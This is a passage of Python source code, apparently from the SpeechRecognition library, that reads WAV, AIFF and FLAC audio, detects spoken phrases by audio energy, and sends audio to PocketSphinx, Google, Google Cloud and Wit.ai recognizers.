self.filename_or_fileobject = filename_or_fileobject
self.stream = None
self.DURATION = None
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
try:
# attempt to read the file as WAV
self.audio_reader = wave.open(self.filename_or_fileobject, "rb")
self.little_endian = True # RIFF WAV is a little-endian format (most ``audioop`` operations assume that the frames are stored in little-endian form)
except (wave.Error, EOFError):
try:
# attempt to read the file as AIFF
self.audio_reader = aifc.open(self.filename_or_fileobject, "rb")
self.little_endian = False # AIFF is a big-endian format
except (aifc.Error, EOFError):
# attempt to read the file as FLAC
if hasattr(self.filename_or_fileobject, "read"):
flac_data = self.filename_or_fileobject.read()
else:
with open(self.filename_or_fileobject, "rb") as f: flac_data = f.read()
# run the FLAC converter with the FLAC data to get the AIFF data
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting AIFF file in stdout, and make sure it's not mixed with any program output
"--decode", "--force-aiff-format", # decode the FLAC file into an AIFF file
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
aiff_data, stderr = process.communicate(flac_data)
aiff_file = io.BytesIO(aiff_data)
try:
self.audio_reader = aifc.open(aiff_file, "rb")
except (aifc.Error, EOFError):
raise ValueError("Audio file could not be read as PCM WAV, AIFF/AIFF-C, or Native FLAC; check if file is corrupted or in another format")
self.little_endian = False # AIFF is a big-endian format
assert 1 <= self.audio_reader.getnchannels() <= 2, "Audio must be mono or stereo"
self.SAMPLE_WIDTH = self.audio_reader.getsampwidth()
# 24-bit audio needs some special handling for old Python versions (workaround for https://bugs.python.org/issue12866)
samples_24_bit_pretending_to_be_32_bit = False
if self.SAMPLE_WIDTH == 3: # 24-bit audio
try: audioop.bias(b"", self.SAMPLE_WIDTH, 0) # test whether this sample width is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
samples_24_bit_pretending_to_be_32_bit = True # while the ``AudioFile`` instance will outwardly appear to be 32-bit, it will actually internally be 24-bit
self.SAMPLE_WIDTH = 4 # the ``AudioFile`` instance should present itself as a 32-bit stream now, since we'll be converting into 32-bit on the fly when reading
self.SAMPLE_RATE = self.audio_reader.getframerate()
self.CHUNK = 4096
self.FRAME_COUNT = self.audio_reader.getnframes()
self.DURATION = self.FRAME_COUNT / float(self.SAMPLE_RATE)
self.stream = AudioFile.AudioFileStream(self.audio_reader, self.little_endian, samples_24_bit_pretending_to_be_32_bit)
return self
def __exit__(self, exc_type, exc_value, traceback):
if not hasattr(self.filename_or_fileobject, "read"): # only close the file if it was opened by this class in the first place (if the file was originally given as a path)
self.audio_reader.close()
self.stream = None
self.DURATION = None
class AudioFileStream(object):
def __init__(self, audio_reader, little_endian, samples_24_bit_pretending_to_be_32_bit):
self.audio_reader = audio_reader # an audio file object (e.g., a `wave.Wave_read` instance)
self.little_endian = little_endian # whether the audio data is little-endian (when working with big-endian things, we'll have to convert it to little-endian before we process it)
self.samples_24_bit_pretending_to_be_32_bit = samples_24_bit_pretending_to_be_32_bit # this is true if the audio is 24-bit audio, but 24-bit audio isn't supported, so we have to pretend that this is 32-bit audio and convert it on the fly
def read(self, size=-1):
buffer = self.audio_reader.readframes(self.audio_reader.getnframes() if size == -1 else size)
if not isinstance(buffer, bytes): buffer = b"" # workaround for https://bugs.python.org/issue24608
sample_width = self.audio_reader.getsampwidth()
if not self.little_endian: # big endian format, convert to little endian on the fly
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4 (incidentally, that also means that we don't need to worry about 24-bit audio being unsupported, since Python 3.4+ always has that functionality)
buffer = audioop.byteswap(buffer, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
buffer = buffer[sample_width - 1::-1] + b"".join(buffer[i + sample_width:i:-1] for i in range(sample_width - 1, len(buffer), sample_width))
# workaround for https://bugs.python.org/issue12866
if self.samples_24_bit_pretending_to_be_32_bit: # we need to convert samples from 24-bit to 32-bit before we can process them with ``audioop`` functions
buffer = b"".join("\x00" + buffer[i:i + sample_width] for i in range(0, len(buffer), sample_width)) # since we're in little endian, we prepend a zero byte to each 24-bit sample to get a 32-bit sample
if self.audio_reader.getnchannels() != 1: # stereo audio
buffer = audioop.tomono(buffer, sample_width, 1, 1) # convert stereo audio data to mono
return buffer
class AudioData(object):
"""
Creates a new ``AudioData`` instance, which represents mono audio data.
The raw audio data is specified by ``frame_data``, which is a sequence of bytes representing audio samples. This is the frame data structure used by the PCM WAV format.
The width of each sample, in bytes, is specified by ``sample_width``. Each group of ``sample_width`` bytes represents a single audio sample.
The audio data is assumed to have a sample rate of ``sample_rate`` samples per second (Hertz).
Usually, instances of this class are obtained from ``recognizer_instance.record`` or ``recognizer_instance.listen``, or in the callback for ``recognizer_instance.listen_in_background``, rather than instantiating them directly.
"""
def __init__(self, frame_data, sample_rate, sample_width):
assert sample_rate > 0, "Sample rate must be a positive integer"
assert sample_width % 1 == 0 and 1 <= sample_width <= 4, "Sample width must be between 1 and 4 inclusive"
self.frame_data = frame_data
self.sample_rate = sample_rate
self.sample_width = int(sample_width)
def get_raw_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the raw frame data for the audio represented by the ``AudioData`` instance.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `RAW/PCM audio file <https://en.wikipedia.org/wiki/Raw_audio_format>`__.
"""
assert convert_rate is None or convert_rate > 0, "Sample rate to convert to must be a positive integer"
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 4), "Sample width to convert to must be between 1 and 4 inclusive"
raw_data = self.frame_data
# make sure unsigned 8-bit audio (which uses unsigned samples) is handled like higher sample width audio (which uses signed samples)
if self.sample_width == 1:
raw_data = audioop.bias(raw_data, 1, -128) # subtract 128 from every sample to make them act like signed samples
# resample audio at the desired rate if specified
if convert_rate is not None and self.sample_rate != convert_rate:
raw_data, _ = audioop.ratecv(raw_data, self.sample_width, 1, self.sample_rate, convert_rate, None)
# convert samples to desired sample width if specified
if convert_width is not None and self.sample_width != convert_width:
if convert_width == 3: # we're converting the audio into 24-bit (workaround for https://bugs.python.org/issue12866)
raw_data = audioop.lin2lin(raw_data, self.sample_width, 4) # convert audio into 32-bit first, which is always supported
try: audioop.bias(b"", 3, 0) # test whether 24-bit audio is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
raw_data = b"".join(raw_data[i + 1:i + 4] for i in range(0, len(raw_data), 4)) # since we're in little endian, we discard the first byte from each 32-bit sample to get a 24-bit sample
else: # 24-bit audio fully supported, we don't need to shim anything
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
else:
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
# if the output is 8-bit audio with unsigned samples, convert the samples we've been treating as signed to unsigned again
if convert_width == 1:
raw_data = audioop.bias(raw_data, 1, 128) # add 128 to every sample to make them act like unsigned samples again
return raw_data
def get_wav_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of a WAV file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `WAV file <https://en.wikipedia.org/wiki/WAV>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
# generate the WAV file contents
with io.BytesIO() as wav_file:
wav_writer = wave.open(wav_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
wav_writer.setframerate(sample_rate)
wav_writer.setsampwidth(sample_width)
wav_writer.setnchannels(1)
wav_writer.writeframes(raw_data)
wav_data = wav_file.getvalue()
finally: # make sure resources are cleaned up
wav_writer.close()
return wav_data
def get_aiff_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of an AIFF-C file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `AIFF-C file <https://en.wikipedia.org/wiki/Audio_Interchange_File_Format>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
sample_width = self.sample_width if convert_width is None else convert_width
# the AIFF format is big-endian, so we need to covnert the little-endian raw data to big-endian
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4
raw_data = audioop.byteswap(raw_data, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
raw_data = raw_data[sample_width - 1::-1] + b"".join(raw_data[i + sample_width:i:-1] for i in range(sample_width - 1, len(raw_data), sample_width))
# generate the AIFF-C file contents
with io.BytesIO() as aiff_file:
aiff_writer = aifc.open(aiff_file, "wb")
try: # note that we can't use context manager, since that was only added in Python 3.4
aiff_writer.setframerate(sample_rate)
aiff_writer.setsampwidth(sample_width)
aiff_writer.setnchannels(1)
aiff_writer.writeframes(raw_data)
aiff_data = aiff_file.getvalue()
finally: # make sure resources are cleaned up
aiff_writer.close()
return aiff_data
def get_flac_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of a FLAC file containing the audio represented by the ``AudioData`` instance.
Note that 32-bit FLAC is not supported. If the audio data is 32-bit and ``convert_width`` is not specified, then the resulting FLAC will be a 24-bit FLAC.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `FLAC file <https://en.wikipedia.org/wiki/FLAC>`__.
"""
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 3), "Sample width to convert to must be between 1 and 3 inclusive"
if self.sample_width > 3 and convert_width is None: # resulting WAV data would be 32-bit, which is not convertable to FLAC using our encoder
convert_width = 3 # the largest supported sample width is 24-bit, so we'll limit the sample width to that
# run the FLAC converter with the WAV data to get the FLAC data
wav_data = self.get_wav_data(convert_rate, convert_width)
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting FLAC file in stdout, and make sure it's not mixed with any program output
"--best", # highest level of compression available
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
flac_data, stderr = process.communicate(wav_data)
return flac_data
class Recognizer(AudioSource):
def __init__(self):
"""
Creates a new ``Recognizer`` instance, which represents a collection of speech recognition functionality.
"""
self.energy_threshold = 400 # minimum audio energy to consider for recording
self.dynamic_energy_threshold = True
self.dynamic_energy_adjustment_damping = 0.15
self.dynamic_energy_ratio = 1.5
self.pause_threshold = 0.6 # seconds of non-speaking audio before a phrase is considered complete
self.operation_timeout = None # seconds after an internal operation (e.g., an API request) starts before it times out, or ``None`` for no timeout
self.phrase_threshold = 0.3 # minimum seconds of speaking audio before we consider the speaking audio a phrase - values below this are ignored (for filtering out clicks and pops)
self.non_speaking_duration = 0.5 # seconds of non-speaking audio to keep on both sides of the recording
def record(self, source, duration=None, offset=None):
"""
Records up to ``duration`` seconds of audio from ``source`` (an ``AudioSource`` instance) starting at ``offset`` (or at the beginning if not specified) into an ``AudioData`` instance, which it returns.
If ``duration`` is not specified, then it will record until there is no more audio input.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before recording, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
frames = io.BytesIO()
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
offset_time = 0
offset_reached = False
while True: # loop for the total number of chunks needed
if offset and not offset_reached:
offset_time += seconds_per_buffer
if offset_time > offset:
offset_reached = True
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break
if offset_reached or not offset:
elapsed_time += seconds_per_buffer
if duration and elapsed_time > duration: break
frames.write(buffer)
frame_data = frames.getvalue()
frames.close()
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def adjust_for_ambient_noise(self, source, duration=1):
"""
Adjusts the energy threshold dynamically using audio from ``source`` (an ``AudioSource`` instance) to account for ambient noise.
Intended to calibrate the energy threshold with the ambient energy level. Should be used on periods of audio without speech - will stop early if any speech is detected.
The ``duration`` parameter is the maximum number of seconds that it will dynamically adjust the threshold for before returning. This value should be at least 0.5 in order to get a representative sample of the ambient noise.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before adjusting, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
elapsed_time = 0
# adjust energy threshold until a phrase starts
while True:
elapsed_time += seconds_per_buffer
if elapsed_time > duration: break
buffer = source.stream.read(source.CHUNK)
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
# dynamically adjust the energy threshold using asymmetric weighted average
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
def listen(self, source, timeout=None, phrase_time_limit=None):
"""
Records a single phrase from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
This is done by waiting until the audio has an energy above ``recognizer_instance.energy_threshold`` (the user has started speaking), and then recording until it encounters ``recognizer_instance.pause_threshold`` seconds of non-speaking or there is no more audio input. The ending silence is not included.
The ``timeout`` parameter is the maximum number of seconds that this will wait for a phrase to start before giving up and throwing an ``speech_recognition.WaitTimeoutError`` exception. If ``timeout`` is ``None``, there will be no wait timeout.
The ``phrase_time_limit`` parameter is the maximum number of seconds that this will allow a phrase to continue before stopping and returning the part of the phrase processed before the time limit was reached. The resulting audio will be the phrase cut off at the time limit. If ``phrase_timeout`` is ``None``, there will be no phrase time limit.
This operation will always complete within ``timeout + phrase_timeout`` seconds if both are numbers, either by returning the audio data, or by raising an exception.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
assert source.stream is not None, "Audio source must be entered before listening, see documentation for ``AudioSource``; are you using ``source`` outside of a ``with`` statement?"
assert self.pause_threshold >= self.non_speaking_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.SAMPLE_RATE
pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of non-speaking audio during a phrase, before the phrase should be considered complete
phrase_buffer_count = int(math.ceil(self.phrase_threshold / seconds_per_buffer)) # minimum number of buffers of speaking audio before we consider the speaking audio a phrase
non_speaking_buffer_count = int(math.ceil(self.non_speaking_duration / seconds_per_buffer)) # maximum number of buffers of non-speaking audio to retain before and after a phrase
# read audio input for phrases until there is a phrase that is long enough
elapsed_time = 0 # number of seconds of audio read
buffer = b"" # an empty buffer means that the stream has ended and there is no data left to read
while True:
frames = collections.deque()
# store audio input until the phrase starts
while True:
# handle waiting too long for phrase by raising an exception
elapsed_time += seconds_per_buffer
if timeout and elapsed_time > timeout:
raise WaitTimeoutError("listening timed out while waiting for phrase to start")
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
if len(frames) > non_speaking_buffer_count: # ensure we only keep the needed amount of non-speaking buffers
frames.popleft()
# detect whether speaking has started on audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold: break
# dynamically adjust the energy threshold using asymmetric weighted average
if self.dynamic_energy_threshold:
damping = self.dynamic_energy_adjustment_damping ** seconds_per_buffer # account for different chunk sizes and rates
target_energy = energy * self.dynamic_energy_ratio
self.energy_threshold = self.energy_threshold * damping + target_energy * (1 - damping)
# read audio input until the phrase ends
pause_count, phrase_count = 0, 0
phrase_start_time = elapsed_time
while True:
# handle phrase being too long by cutting off the audio
elapsed_time += seconds_per_buffer
if phrase_time_limit and elapsed_time - phrase_start_time > phrase_time_limit:
break
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
phrase_count += 1
# check if speaking has stopped for longer than the pause threshold on the audio input
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # unit energy of the audio signal within the buffer
if energy > self.energy_threshold:
pause_count = 0
else:
pause_count += 1
if pause_count > pause_buffer_count: # end of the phrase
break
# check how long the detected phrase is, and retry listening if the phrase is too short
phrase_count -= pause_count # exclude the buffers for the pause before the phrase
if phrase_count >= phrase_buffer_count or len(buffer) == 0: break # phrase is long enough or we've reached the end of the stream, so stop listening
# obtain frame data
for i in range(pause_count - non_speaking_buffer_count): frames.pop() # remove extra non-speaking frames at the end
frame_data = b"".join(list(frames))
return AudioData(frame_data, source.SAMPLE_RATE, source.SAMPLE_WIDTH)
def listen_in_background(self, source, callback, phrase_time_limit=None):
"""
Spawns a thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase are detected.
Returns a function object that, when called, requests that the background listener thread stop, and waits until it does before returning. The background thread is a daemon and will not stop the program from exiting if there are no other non-daemon threads.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``. The ``phrase_time_limit`` parameter works in the same way as the ``phrase_time_limit`` parameter for ``recognizer_instance.listen(source)``, as well.
The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that ``callback`` function will be called from a non-main thread.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
running = [True]
def threaded_listen():
with source as s:
while running[0]:
try: # listen for 1 second, then check again if the stop function has been called
audio = self.listen(s, 1)
except WaitTimeoutError: # listening timed out, just try again
pass
else:
if running[0]: callback(self, audio)
def stopper():
running[0] = False
listener_thread.join() # block until the background thread is done, which can be up to 1 second
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.daemon = True
listener_thread.start()
return stopper
def recognize_sphinx(self, audio_data, language="en-US", keyword_entries=None, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using CMU Sphinx.
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` or ``"en-GB"``, defaulting to US English. Out of the box, only ``en-US`` is supported. See `Notes on using `PocketSphinx <https://github.com/Uberi/speech_recognition/blob/master/reference/pocketsphinx.rst>`__ for information about installing other languages. This document is also included under ``reference/pocketsphinx.rst``.
If specified, the keywords to search for are determined by ``keyword_entries``, an iterable of tuples of the form ``(keyword, sensitivity)``, where ``keyword`` is a phrase, and ``sensitivity`` is how sensitive to this phrase the recognizer should be, on a scale of 0 (very insensitive, more false negatives) to 1 (very sensitive, more false positives) inclusive. If not specified or ``None``, no keywords are used and Sphinx will simply transcribe whatever words it recognizes. Specifying ``keyword_entries`` is more accurate than just looking for those same keywords in non-keyword-based transcriptions, because Sphinx knows specifically what sounds to look for.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the Sphinx ``pocketsphinx.pocketsphinx.Decoder`` object resulting from the recognition.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if there are any issues with the Sphinx installation.
"""
assert isinstance(audio_data, AudioData), "``audio_data`` must be audio data"
assert isinstance(language, str), "``language`` must be a string"
assert keyword_entries is None or all(isinstance(keyword, (type(""), type(u""))) and 0 <= sensitivity <= 1 for keyword, sensitivity in keyword_entries), "``keyword_entries`` must be ``None`` or a list of pairs of strings and numbers between 0 and 1"
# import the PocketSphinx speech recognition module
try:
import pocketsphinx
except ImportError:
raise RequestError("missing PocketSphinx module: ensure that PocketSphinx is set up correctly.")
except ValueError:
raise RequestError("bad PocketSphinx installation detected; make sure you have PocketSphinx version 0.0.9 or better.")
language_directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), "pocketsphinx-data", language)
if not os.path.isdir(language_directory):
raise RequestError("missing PocketSphinx language data directory: \"{}\"".format(language_directory))
acoustic_parameters_directory = os.path.join(language_directory, "acoustic-model")
if not os.path.isdir(acoustic_parameters_directory):
raise RequestError("missing PocketSphinx language model parameters directory: \"{}\"".format(acoustic_parameters_directory))
language_model_file = os.path.join(language_directory, "language-model.lm.bin")
if not os.path.isfile(language_model_file):
raise RequestError("missing PocketSphinx language model file: \"{}\"".format(language_model_file))
phoneme_dictionary_file = os.path.join(language_directory, "pronounciation-dictionary.dict")
if not os.path.isfile(phoneme_dictionary_file):
raise RequestError("missing PocketSphinx phoneme dictionary file: \"{}\"".format(phoneme_dictionary_file))
# create decoder object
config = pocketsphinx.Decoder.default_config()
config.set_string("-hmm", acoustic_parameters_directory) # set the path of the hidden Markov model (HMM) parameter files
config.set_string("-lm", language_model_file)
config.set_string("-dict", phoneme_dictionary_file)
config.set_string("-logfn", os.devnull) # disable logging (logging causes unwanted output in terminal)
decoder = pocketsphinx.Decoder(config)
# obtain audio data
raw_data = audio_data.get_raw_data(convert_rate=16000, convert_width=2) # the included language models require audio to be 16-bit mono 16 kHz in little-endian format
# obtain recognition results
if keyword_entries is not None: # explicitly specified set of keywords
with tempfile.NamedTemporaryFile("w") as f:
# generate a keywords file - Sphinx documentation recommendeds sensitivities between 1e-50 and 1e-5
f.writelines("{} /1e{}/\n".format(keyword, 100 * sensitivity - 110) for keyword, sensitivity in keyword_entries)
f.flush()
# perform the speech recognition with the keywords file (this is inside the context manager so the file isn;t deleted until we're done)
decoder.set_kws("keywords", f.name)
decoder.set_search("keywords")
decoder.start_utt() # begin utterance processing
decoder.process_raw(raw_data, False, True) # process audio data with recognition enabled (no_search = False), as a full utterance (full_utt = True)
decoder.end_utt() # stop utterance processing
else: # no keywords, perform freeform recognition
decoder.start_utt() # begin utterance processing
decoder.process_raw(raw_data, False, True) # process audio data with recognition enabled (no_search = False), as a full utterance (full_utt = True)
decoder.end_utt() # stop utterance processing
if show_all: return decoder
# return results
hypothesis = decoder.hyp()
if hypothesis is not None: return hypothesis.hypstr
raise UnknownValueError() # no transcriptions available
def recognize_google(self, audio_data, key=None, language="en-US", show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Speech Recognition API.
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box. This should generally be used for personal or testing purposes only, as it **may be revoked by Google at any time**.
To obtain your own API key, simply following the steps on the `API Keys <http://www.chromium.org/developers/how-tos/api-keys>`__ page at the Chromium Developers site. In the Google Developers Console, Google Speech Recognition is listed as "Speech API".
The recognition language is determined by ``language``, an RFC5646 language tag like ``"en-US"`` (US English) or ``"fr-FR"`` (International French), defaulting to US English. A list of supported language tags can be found in this `StackOverflow answer <http://stackoverflow.com/a/14302134>`__.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "``audio_data`` must be audio data"
assert key is None or isinstance(key, str), "``key`` must be ``None`` or a string"
assert isinstance(language, str), "``language`` must be a string"
flac_data = audio_data.get_flac_data(
convert_rate=None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width=2 # audio samples must be 16-bit
)
if key is None: key = "AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw"
url = "http://www.google.com/speech-api/v2/recognize?{}".format(urlencode({
"client": "chromium",
"lang": language,
"key": key,
}))
request = Request(url, data=flac_data, headers={"Content-Type": "audio/x-flac; rate={}".format(audio_data.sample_rate)})
# obtain audio transcription results
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
break
# return results
if show_all: return actual_result
if not isinstance(actual_result, dict) or len(actual_result.get("alternative", [])) == 0: raise UnknownValueError()
# return alternative with highest confidence score
best_hypothesis = max(actual_result["alternative"], key=lambda alternative: alternative["confidence"])
if "transcript" not in best_hypothesis: raise UnknownValueError()
return best_hypothesis["transcript"]
def recognize_google_cloud(self, audio_data, credentials_json=None, language="en-US", preferred_phrases=None, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Google Cloud Speech API.
This function requires a Google Cloud Platform account; see the `Google Cloud Speech API Quickstart <https://cloud.google.com/speech/docs/getting-started>`__ for details and instructions. Basically, create a project, enable billing for the project, enable the Google Cloud Speech API for the project, and set up Service Account Key credentials for the project. The result is a JSON file containing the API credentials. The text content of this JSON file is specified by ``credentials_json``. If not specified, the library will try to automatically `find the default API credentials JSON file <https://developers.google.com/identity/protocols/application-default-credentials>`__.
The recognition language is determined by ``language``, which is a BCP-47 language tag like ``"en-US"`` (US English). A list of supported language tags can be found in the `Google Cloud Speech API documentation <https://cloud.google.com/speech/docs/languages>`__.
If ``preferred_phrases`` is a list of phrase strings, those given phrases will be more likely to be recognized over similar-sounding alternatives. This is useful for things like keyword/command recognition or adding new phrases that aren't in Google's vocabulary. Note that the API imposes certain `restrictions on the list of phrase strings <https://cloud.google.com/speech/limits#content>`__.
Returns the most likely transcription if ``show_all`` is False (the default). Otherwise, returns the raw API response as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the credentials aren't valid, or if there is no Internet connection.
"""
assert isinstance(audio_data, AudioData), "``audio_data`` must be audio data"
assert credentials_json is None or isinstance(credentials_json, str), "``credentials_json_file_path`` must be ``None`` or a string"
assert isinstance(language, str), "``language`` must be a string"
assert preferred_phrases is None or all(isinstance(preferred_phrases, (type(""), type(u""))) for preferred_phrases in preferred_phrases), "``preferred_phrases`` must be a list of strings"
# See https://cloud.google.com/speech/reference/rest/v1beta1/RecognitionConfig
flac_data = audio_data.get_flac_data(
convert_rate=None if 8000 <= audio_data.sample_rate <= 48000 else max(8000, min(audio_data.sample_rate, 48000)), # audio sample rate must be between 8 kHz and 48 kHz inclusive - clamp sample rate into this range
convert_width=2 # audio samples must be 16-bit
)
try:
from oauth2client.client import GoogleCredentials
from googleapiclient.discovery import build
import googleapiclient.errors
if credentials_json is None:
api_credentials = GoogleCredentials.get_application_default()
else:
# the credentials can only be read from a file, so we'll make a temp file and write in the contents to work around that
with tempfile.NamedTemporaryFile("w") as f:
f.write(credentials_json)
f.flush()
api_credentials = GoogleCredentials.from_stream(f.name)
speech_service = build("speech", "v1beta1", credentials=api_credentials)
except ImportError:
raise RequestError("missing google-api-python-client module: ensure that google-api-python-client is set up correctly.")
if preferred_phrases is None:
speech_config = {"encoding": "FLAC", "sampleRate": audio_data.sample_rate, "languageCode": language}
else:
speech_config = {"encoding": "FLAC", "sampleRate": audio_data.sample_rate, "languageCode": language, "speechContext": {"phrases": preferred_phrases}}
request = speech_service.speech().syncrecognize(body={"audio": {"content": base64.b64encode(flac_data).decode("utf8")}, "config": speech_config})
try:
response = request.execute()
except googleapiclient.errors.HttpError as e:
raise RequestError(e)
except URLError as e:
raise RequestError("recognition connection failed: {0}".format(e.reason))
if show_all: return response
if "results" not in response or len(response["results"]) == 0: raise UnknownValueError()
transcript = ""
for result in response["results"]:
transcript += result["alternatives"][0]["transcript"].strip() + " "
return transcript
def recognize_wit(self, audio_data, key, show_all=False):
"""
Performs speech recognition on ``audio_data`` (an ``AudioData`` instance), using the Wit.ai API.
The Wit.ai API key is specified by ``key``. Unfortunately, these are not available without `signing up for an account <https://wit.ai/>`__ and creating an app. You will need to add at least one intent to the app before you can see the API key, though the actual intent settings don't matter.
To get the API key for a Wit.ai app, go to the app's overview page, go to the section titled "Make an API request", and look for something along the lines of ``Authorization: Bearer XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX``; ``XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`` is the API key. Wit.ai API keys are 32-character uppercase alphanumeric strings.
The recognition language is configured in the Wit.ai app settings.
Returns the most likely transcription if ``show_all`` is false (the default). Otherwise, returns the `raw API response <https://wit.ai/docs/http/20141022#get-intent-via-text-link>`__ as a JSON dictionary.
Raises a ``speech_recognition.UnknownValueError`` exception if the speech is unintelligible. Raises a ``speech_recognition.RequestError`` exception if the speech recognition operation failed, if the key isn't valid, or if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
assert isinstance(key, str), "``key`` must be a string"
wav_data = audio_data.get_wav_data(
convert_rate=None if audio_data.sample_rate >= 8000 else 8000, # audio samples must be at least 8 kHz
convert_width=2 # audio samples should be 16-bit
)
url = "https://api.wit.ai/speech?v=20160526"
request = Request(url, data=wav_data, headers={"Authorization": "Bearer {}".format(key), "Content-Type": "audio/wav"})
try:
response = urlopen(request, timeout=self.operation_timeout)
except HTTPError as e:
raise RequestError("recognition request failed: {}".format(e.reason))
except URLError as e:
raise RequestError("recognition connection failed: {}".format(e.reason))
response_text = response.read().decode("utf-8")
result = json.loads(response_text)
